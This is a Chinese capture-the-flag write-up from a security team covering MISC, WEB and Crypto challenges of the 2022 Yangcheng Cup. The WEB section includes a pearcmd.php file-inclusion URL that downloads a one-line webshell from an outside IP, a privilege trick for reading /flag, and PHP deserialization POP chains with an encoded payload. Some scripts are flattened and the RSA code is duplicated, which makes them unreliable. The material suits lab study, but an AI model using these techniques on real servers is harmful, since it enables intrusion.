CTF|2022羊城杯部分题目WP

admin 2022年9月8日16:41:31CTF专场评论41 views28000字阅读93分20秒阅读模式
CTF|2022羊城杯部分题目WP



0x01  MISC

签到:


打开附件查看题目为一段密文

CTF|2022羊城杯部分题目WP

使用rot13进行解码,等到一段新的密文

CTF|2022羊城杯部分题目WP

再通过base32解码,得到flag

CTF|2022羊城杯部分题目WP


迷失幻境


使用取证大师加载虚拟机磁盘文件vmdk文件

CTF|2022羊城杯部分题目WP

将可爱可莉和哒哒哒分别导出

CTF|2022羊城杯部分题目WP

45这张没有后缀的特殊图片导出

CTF|2022羊城杯部分题目WP

使用png后缀将其打开发现缺少文件头

CTF|2022羊城杯部分题目WP

修复文件后将图片45和100进行异或,得到key值

CTF|2022羊城杯部分题目WP

尝试对可爱可莉进行解密最终确定为outguess

CTF|2022羊城杯部分题目WP

得到flag

CTF|2022羊城杯部分题目WP


where_is_secret:

文件名vig提示维吉尼亚解密

CTF|2022羊城杯部分题目WP

CTF|2022羊城杯部分题目WP

CTF|2022羊城杯部分题目WP

密码为[email protected],打开压缩包得到加密的图片

CTF|2022羊城杯部分题目WP

根据题目提示给的加密代码,百度搜索找到一个B站视频

CTF|2022羊城杯部分题目WP

CTF|2022羊城杯部分题目WP

利用视频里给的脚本解密得到答案,

from PIL import Imagedef decode(im):  width,height = im.size  lst = []  for y in range(height):    for x in range(width):      red,green,blue = im.getpixel((x,y))      if(blue | green | red) == 0:      break     index = (green<<8) + blue     lst.append(chr(index))     print(lst)  return ''.join(lst)if __name__== '_main_ ':all_text = decode(Image.open("G:/2022羊城/where_is_secret的附件/tempdir/MISC附件/vivo50/picture/out.bmp","rb"))print(all_text)with open ("decode.text","w",encoding = "utf-8") as f:  f.write(all_text)

得到最后的flag{h1d3_1n_th3_p1ctur3}


寻宝-Fix:


查看游戏第一部分地形为变异猪圈,第一部分密码:OWOH

CTF|2022羊城杯部分题目WP

之后的地形为差分曼切斯特编码,手撸出来为01011111011000010011000101011111

转十六进制再转字符得到第二部分密码_a1_

CTF|2022羊城杯部分题目WP

CTF|2022羊城杯部分题目WP

听游戏的背景音乐可以听到琴声,按键为114514,即为第三部分密码

压缩包密码:OWOH_a1_114514

解开压缩包  最后是0宽字符隐写

CTF|2022羊城杯部分题目WP

GWHT{Wher3_1S_Th4_1gI981O?}



0x02  WEB

rce_me:

CTF|2022羊城杯部分题目WP

审计代码典型的文件包含通过过滤的create、install、pear找到技术文章https://blog.csdn.net/mrs_h/article/details/122386511

利用download远程下载服务器上的一句话木马,写入shell

http://80.endpoint-b381c85aca0f422a89986bc830a94c24.dasc.buuoj.cn:81/?file=/usr/local/lib/php/%70%65arcmd.php&+download+http://8.219.177.111/1.php

使用蚁剑连接    查看不了flag文件

CTF|2022羊城杯部分题目WP

使用终端进行操作    date  -f /flag  实现提权 得到flag

CTF|2022羊城杯部分题目WP


step_by_step-v3

CTF|2022羊城杯部分题目WP

典型的反序列化  利用下魔术函数构造pop链子

class yang{    public $y1;}class cheng{    public $c1;}class bei{    public $b1;}$a=new yang();$b=new cheng();$c=new bei();$b->c1=$c;$c->b1=$a;$a->y1='phpinfo';echo serialize($b);?>

CTF|2022羊城杯部分题目WP

执行phpinfo

CTF|2022羊城杯部分题目WP

尝试执行ls  命令发现没有回显

后面在phpinfo当中直接搜索flag  

CTF|2022羊城杯部分题目WP


Safepop:

CTF|2022羊城杯部分题目WP

原题地址:https://xz.aliyun.com/t/10961

Pop链

<?phpclass Fun{private $func;public function __construct(){$this->func = [new Test,'getFlag'];//也可以写为$this->func = "Test::getFlag";这样由于没有实例化Test类,还不会触发Test里的__wakeup()}}class Test{public function getFlag(){}}class A{public $a;}class B{public $p;}$Test = new Test;$Fun = new Fun;$a = new A;$b = new B;$a->a = $Fun;$b->a = $a;$r = serialize($b);$r1 = str_replace('"Fun":1:','"Fun":2:',$r);echo urlencode($r1);<?phpclass Fun{private $func;public function __construct(){$this->func = [new Test,'getFlag'];//也可以写为$this->func = "Test::getFlag";这样由于没有实例化Test类,还不会触发Test里的__wakeup()}}class Test{public function getFlag(){}}class A{public $a;}class B{public $p;}$Test = new Test;$Fun = new Fun;$a = new A;$b = new B;$a->a = $Fun;$b->a = $a;$r = serialize($b);$r1 = str_replace('"Fun":1:','"Fun":2:',$r);echo urlencode($r1);

Payload:

O%3A1%3A%22B%22%3A2%3A%7Bs%3A1%3A%22p%22%3BN%3Bs%3A1%3A%22a%22%3BO%3A1%3A%22A%22%3A1%3A%7Bs%3A1%3A%22a%22%3BO%3A3%3A%22Fun%22%3A2%3A%7Bs%3A9%3A%22%00Fun%00func%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A4%3A%22Test%22%3A0%3A%7B%7Di%3A1%3Bs%3A7%3A%22getFlag%22%3B%7D%7D%7D%7D

按照对应参数传参,得到最后的flag

CTF|2022羊城杯部分题目WP


0x03  Crypto


EasyRsa


import gmpy2c = 38127524839835864306737280818907796566475979451567460500065967565655632622992572530918601432256137666695102199970580936307755091109351218835095309766358063857260088937006810056236871014903809290530667071255731805071115169201705265663551734892827553733293929057918850738362888383312352624299108382366714432727e = 65537n=[65439077968397540989065489337415940784529269429684649365065378651353483030304843439003949649543376311871845618819107350646437252980144978447924976470943930075812834237368425374578215977641265884859875440799334807607478705932175148673160353577875890074101393042506714001617338265284910381849259298772642190619,86843235426823545017422014398916780909062053456790256392304973548517489132984667679637386416948409930796162377844525829968317585749956057149930523547463230147376192820753802868362225137830225967953826475779047454555958271846035526319036389127587352017149417549187850782892924691511398536178090031958365483499,57839320383142814687522363258949714784622321678585619281948174372461045134361003939684803510572969567182690634502610963365500727981041136988638273942465134797850643121827808482673619534240872593224537996099454035648829692386918230535360101064254854063175494150147494342652670585674593236663514793256521719547,52668168898129361356420333177679019946307853075463961068071790653159090226904625885080236174231665178538405547828768043706515464922611051221394704678558922339886480247663138702481349098077291584992082414494275463670330534613607852999291645500391111597009868188974671249118213040057429113174377610094956993269,79875848044631194160351918105738804229446748736206976033243436373010695259945613104837645712048695514204494137005015770637421510392760763371639480133851920449252506525423837434811693638210458851990502785655738042348115385964604080872180121543147063180945532713593712726527002909054818485584237993215139630243,73100501797447180147684637554796375398455002202770022931512541062214916136294604754404667725341796896161398464327153718845280194035978972665664657052946003418121755545770123205426883869361411412259838522099085901563107814985172942977520233320215882707710717870398128412272218474014381169303848087621856187879,89149546555397759430343098936690138982544367561661914051499112345535238108800665531588376806546499374457634397161670140520060064963391826220177798442707381640723248034061313974522233415815795656570220902974484865176728535660627712374835329967608728216749734529761431592345816592875807318876347151421393671763,66449107450661172442868032153863675098235855689218695279414435182923510356012957155941548483160873271040452368644926703812707864779900715051152673705082002761445847561495295455460041902473282731259268870375921215589157288622757488879539441498396276257589120302991242300378364101246448094955634459779361686643,79694880331320743031437708811856697413105291652061062223857313580221562305807771003185061831752133665835648647560103986928466217390444724672894866216636981793418219455653595717274553950715056120806463449033181486699963584346517910081706586345546292894426402568226579894766693070066214488743160957135286739213,70521001788476157145543175674209083194325853388116385624440232036679708917857095748070597575068955423165296665429648694541353249787337464272095260410717659726012806836884799476995758902361678737968193674368688353935424186389207123637734230550266810766585903134004322848985320790788169777840924595645463787189,51801430118171456966246071852561156183140136541960623661080056673664466785669585092926482194691254461430866302262960624015915371927788809661387318097968209364907625599562339722700041444342116899266802018340155635959614677597708758012024981583143521259152639480003228924151971208695043251548758407218187895663,87310111118839703578797261862424304499548882114635944516216618095145194843718635007052242072452831460162126955481326379219639313067967998826898344673513019946299427614605216960081461930080199023399060417820769438661351988322185620598552697590115678078498754112860310272842870106790357443602405008865116282919]p=gmpy2.gcd(n[0],n[1])for i in n[::-1]:   n = i   q = n//p   d = int(gmpy2.invert(e, (p - 1) * (q - 1)))   m = pow(c, d, n)   c = mprint(bytes.fromhex(hex(m)[2:]))

CTF|2022羊城杯部分题目WP


LRSA


# B=1023# P*P*Q=17550772391048142376662352375650397168226219900284185133945819378595084615279414529115194246625188015626268312188291451580718399491413731583962229337205180301248556893326419027312533686033888462669675100382278716791450615542537581657011200868911872550652311318486382920999726120813916439522474691195194557657267042628374572411645371485995174777885120394234154274071083542059010253657420242098856699109476857347677270860654429688935924519805555787949683144015873225388396740487817155358042797286990338440987035608851331840925854381286767024584195081004360635842976624747610461507795755042915965483135990495921912997789567020652729777216671481467049291624343256152446367091568361258918212012737611001009003078023715854575413979603297947011959023398306612437250872299406744778763429172689675430968886613391356192380152315042387148665654062576525633130546454743040442444227245763939134967515614637300940642555367668537324892890004459521919887178391559206373513466653484926149453481758790663522317898916616435463486824881406198956479504970446076256447830689197409184703931842169195650953917594642601134810084247402051464584676932882503143409428970896718980446185114397748313655630266379123438583315809104543663538494519415242569480492899140190587129956835218417371308642212037424611690324353109931657289337536406499314388951678319136343913551598851601805737870217800009086551022197432448461112330252097447894028786035069710260561955740514091976513928307284531381150606428802334767412638213776730300093872457594524254858721551285338651364457529927871215183857169772407595348187949014442596356406144157105062291018215254440382214000573515515859668018846789551567310531570458316720877172632139481792680258388798439064221051325274383331521717987420093245521230610073103811158660291643007279940393509663374960353315388446956868294358252276964954745551655711981# P*Q*Q=17632503734712698604217167790453868045296303200715867263641257955056721075502316035280716025016839471684329988600978978424661087892466132185482035374940487837109552684763339574491378951189521258328752145077889261805000262141719400516584216130899437363088936913664419705248701787497332582188063869114908628807937049986360525010012039863210179017248132893824655341728382780250878156526086594253092249935304259986328308203344932540888448163430113818706295806406535364433801544858874357459282988110371175948011077595778123265914357153104206808258347815853145593128831233094769191889153762451880396333921190835200889266000562699392602082643298040136498839726733129090381507278582253125509943696419087708429546384313035073010683709744463087794325058122495375333875728593383803489271258323466068830034394348582326189840226236821974979834541554188673335151333713605570214286605391522582123096490317734786072061052604324131559447145448500381240146742679889154145555389449773359530020107821711994953950072547113428811855524572017820861579995449831880269151834230607863568992929328355995768974532894288752369127771516710199600449849031992434777962666440682129817924824151147427747882725858977273856311911431085373396551436319200582072164015150896425482384248479071434032953021738952688256364397405939276917210952583838731888536160866721278250628482428975748118973182256529453045184370543766401320261730361611365906347736001225775255350554164449014831203472238042057456969218316231699556466298168668958678855382462970622819417830000343573014265235688391542452769592096406400900187933156352226983897249981036555748543606676736274049188713348408983072484516372145496924391146241282884948724825393087105077360952770212959517318021248639012476095670769959011548699960423508352158455979906789927951812368185987838359200354730654103428077770839008773864604836807261909# t=44# c=4364802217291010807437827526073499188746160856656033054696031258814848127341094853323797303333741617649819892633013549917144139975939225893749114460910089509552261297408649636515368831194227006310835137628421405558641056278574098849091436284763725120659865442243245486345692476515256604820175726649516152356765363753262839864657243662645981385763738120585801720865252694204286145009527172990713740098977714337038793323846801300955225503801654258983911473974238212956519721447805792992654110642511482243273775873164502478594971816554268730722314333969932527553109979814408613177186842539860073028659812891580301154746from gmpy2 import *from Crypto.Util.number import *from libnum import *e=65537c=4364802217291010807437827526073499188746160856656033054696031258814848127341094853323797303333741617649819892633013549917144139975939225893749114460910089509552261297408649636515368831194227006310835137628421405558641056278574098849091436284763725120659865442243245486345692476515256604820175726649516152356765363753262839864657243662645981385763738120585801720865252694204286145009527172990713740098977714337038793323846801300955225503801654258983911473974238212956519721447805792992654110642511482243273775873164502478594971816554268730722314333969932527553109979814408613177186842539860073028659812891580301154746abs=gmpy2.gcd(a,b)P=a//sQ=b//s#P=25947339118736016261419550658264175914664266822085997909314096786508816404704696671837899420298768803641977765786592354116676036035881712512184992851487828263900367476619650087372125353190561974783134059421570649293920248116730478378196277387377082481961542018611824082110164117796622604412648512092528479878502094797494405077897059911764470830302447618882229233093021156725194893124743848364119720591518073753197359351271987724752861168913839307431377592888760273762302003490303315903644695784992125784390012046834505490167165377346036077504298195544062111718133371983287540723388743607671934081891907851056034062109#Q=26068172028162605137516470004551766376185367701690988148920400408760716114172673253571631718337447931195718779018987169967053546674529251665443499183399035216407895285607965767100708187327533611193709308966698251023076404422362272378862918994525181107002728889256377161661579892599243396304207048944032235378667269998644227976609632271355152717352269223310163307304914315780234040829575689991453848537587516055955657960061856059046256125836544109066275645648666876772298883460637600522819402448386193499472702636751025558486665290530268273787746964353937663176851849214999005525738643454160169651485201028944583316101def Simplify(cf):numerator = 0denominator = 1for x in cf[::-1]:numerator, denominator = denominator, x * denominator + numeratorreturn (numerator, denominator)f=[]while Q:f+=[P//Q]P,Q=Q,P%Qcf = []for i in range(1,len(f)):numerator = 0denominator = 1for x in f[::i]:numerator, denominator = denominator, x * denominator + numeratorcf.append(Simplify(f[:i]))for g in cf:if(isPrime(g[0] + 58)) and bit_length(g[0] + 58) == 1023:p = g[0] + 58print(p)d = gmpy2.invert(e, p-1)print(n2s(int(pow(c, d, p))))# B=1023# P*P*Q=17550772391048142376662352375650397168226219900284185133945819378595084615279414529115194246625188015626268312188291451580718399491413731583962229337205180301248556893326419027312533686033888462669675100382278716791450615542537581657011200868911872550652311318486382920999726120813916439522474691195194557657267042628374572411645371485995174777885120394234154274071083542059010253657420242098856699109476857347677270860654429688935924519805555787949683144015873225388396740487817155358042797286990338440987035608851331840925854381286767024584195081004360635842976624747610461507795755042915965483135990495921912997789567020652729777216671481467049291624343256152446367091568361258918212012737611001009003078023715854575413979603297947011959023398306612437250872299406744778763429172689675430968886613391356192380152315042387148665654062576525633130546454743040442444227245763939134967515614637300940642555367668537324892890004459521919887178391559206373513466653484926149453481758790663522317898916616435463486824881406198956479504970446076256447830689197409184703931842169195650953917594642601134810084247402051464584676932882503143409428970896718980446185114397748313655630266379123438583315809104543663538494519415242569480492899140190587129956835218417371308642212037424611690324353109931657289337536406499314388951678319136343913551598851601805737870217800009086551022197432448461112330252097447894028786035069710260561955740514091976513928307284531381150606428802334767412638213776730300093872457594524254858721551285338651364457529927871215183857169772407595348187949014442596356406144157105062291018215254440382214000573515515859668018846789551567310531570458316720877172632139481792680258388798439064221051325274383331521717987420093245521230610073103811158660291643007279940393509663374960353315388446956868294358252276964954745551655711981# P*Q*Q=17632503734712698604217167790453868045296303200715867263641257955056721075502316035280716025016839471684329988600978978424661087892466132185482035374940487837109552684763339574491378951189521258328752145077889261805000262141719400516584216130899437363088936913664419705248701787497332582188063869114908628807937049986360525010012039863210179017248132893824655341728382780250878156526086594253092249935304259986328308203344932540888448163430113818706295806406535364433801544858874357459282988110371175948011077595778123265914357153104206808258347815853145593128831233094769191889153762451880396333921190835200889266000562699392602082643298040136498839726733129090381507278582253125509943696419087708429546384313035073010683709744463087794325058122495375333875728593383803489271258323466068830034394348582326189840226236821974979834541554188673335151333713605570214286605391522582123096490317734786072061052604324131559447145448500381240146742679889154145555389449773359530020107821711994953950072547113428811855524572017820861579995449831880269151834230607863568992929328355995768974532894288752369127771516710199600449849031992434777962666440682129817924824151147427747882725858977273856311911431085373396551436319200582072164015150896425482384248479071434032953021738952688256364397405939276917210952583838731888536160866721278250628482428975748118973182256529453045184370543766401320261730361611365906347736001225775255350554164449014831203472238042057456969218316231699556466298168668958678855382462970622819417830000343573014265235688391542452769592096406400900187933156352226983897249981036555748543606676736274049188713348408983072484516372145496924391146241282884948724825393087105077360952770212959517318021248639012476095670769959011548699960423508352158455979906789927951812368185987838359200354730654103428077770839008773864604836807261909# t=44# c=4364802217291010807437827526073499188746160856656033054696031258814848127341094853323797303333741617649819892633013549917144139975939225893749114460910089509552261297408649636515368831194227006310835137628421405558641056278574098849091436284763725120659865442243245486345692476515256604820175726649516152356765363753262839864657243662645981385763738120585801720865252694204286145009527172990713740098977714337038793323846801300955225503801654258983911473974238212956519721447805792992654110642511482243273775873164502478594971816554268730722314333969932527553109979814408613177186842539860073028659812891580301154746from gmpy2 import *from Crypto.Util.number import *from libnum import *e=65537c=4364802217291010807437827526073499188746160856656033054696031258814848127341094853323797303333741617649819892633013549917144139975939225893749114460910089509552261297408649636515368831194227006310835137628421405558641056278574098849091436284763725120659865442243245486345692476515256604820175726649516152356765363753262839864657243662645981385763738120585801720865252694204286145009527172990713740098977714337038793323846801300955225503801654258983911473974238212956519721447805792992654110642511482243273775873164502478594971816554268730722314333969932527553109979814408613177186842539860073028659812891580301154746abs=gmpy2.gcd(a,b)P=a//sQ=b//s#P=25947339118736016261419550658264175914664266822085997909314096786508816404704696671837899420298768803641977765786592354116676036035881712512184992851487828263900367476619650087372125353190561974783134059421570649293920248116730478378196277387377082481961542018611824082110164117796622604412648512092528479878502094797494405077897059911764470830302447618882229233093021156725194893124743848364119720591518073753197359351271987724752861168913839307431377592888760273762302003490303315903644695784992125784390012046834505490167165377346036077504298195544062111718133371983287540723388743607671934081891907851056034062109#Q=26068172028162605137516470004551766376185367701690988148920400408760716114172673253571631718337447931195718779018987169967053546674529251665443499183399035216407895285607965767100708187327533611193709308966698251023076404422362272378862918994525181107002728889256377161661579892599243396304207048944032235378667269998644227976609632271355152717352269223310163307304914315780234040829575689991453848537587516055955657960061856059046256125836544109066275645648666876772298883460637600522819402448386193499472702636751025558486665290530268273787746964353937663176851849214999005525738643454160169651485201028944583316101def Simplify(cf):numerator = 0denominator = 1for x in cf[::-1]:numerator, denominator = denominator, x * denominator + numeratorreturn (numerator, denominator)f=[]while Q:f+=[P//Q]P,Q=Q,P%Qcf = []for i in range(1,len(f)):numerator = 0denominator = 1for x in f[::i]:numerator, denominator = denominator, x * denominator + numeratorcf.append(Simplify(f[:i]))for g in cf:if(isPrime(g[0] + 58)) and bit_length(g[0] + 58) == 1023:p = g[0] + 58print(p)d = gmpy2.invert(e, p-1)print(n2s(int(pow(c, d, p))))

CTF|2022羊城杯部分题目WP


0x04  免责声明

    本文仅限于技术研究学习,切勿将文中技术细节用作非法用途,如有违者后果自负。


关于我们


“TERRA星环”安全团队正式成立于2020年,是贵州泰若数字科技有限公司旗下以互联网攻防技术研究为目标的安全团队。团队核心成员长期从事渗透测试、代码审计、应急响应等安服工作,多次参与国家、省级攻防演练行动,具备丰富的安服及攻防对抗经验。

团队专注于漏洞挖掘、漏洞研究、红蓝对抗、CTF夺旗、溯源取证、威胁情报、代码审计、逆向分析等研究。对外提供安全评估、安全培训、安全咨询、安全集成、应急响应等服务。

原文始发于微信公众号(TERRA星环安全团队):CTF|2022羊城杯部分题目WP

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年9月8日16:41:31
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  CTF|2022羊城杯部分题目WP http://cn-sec.com/archives/1286402.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: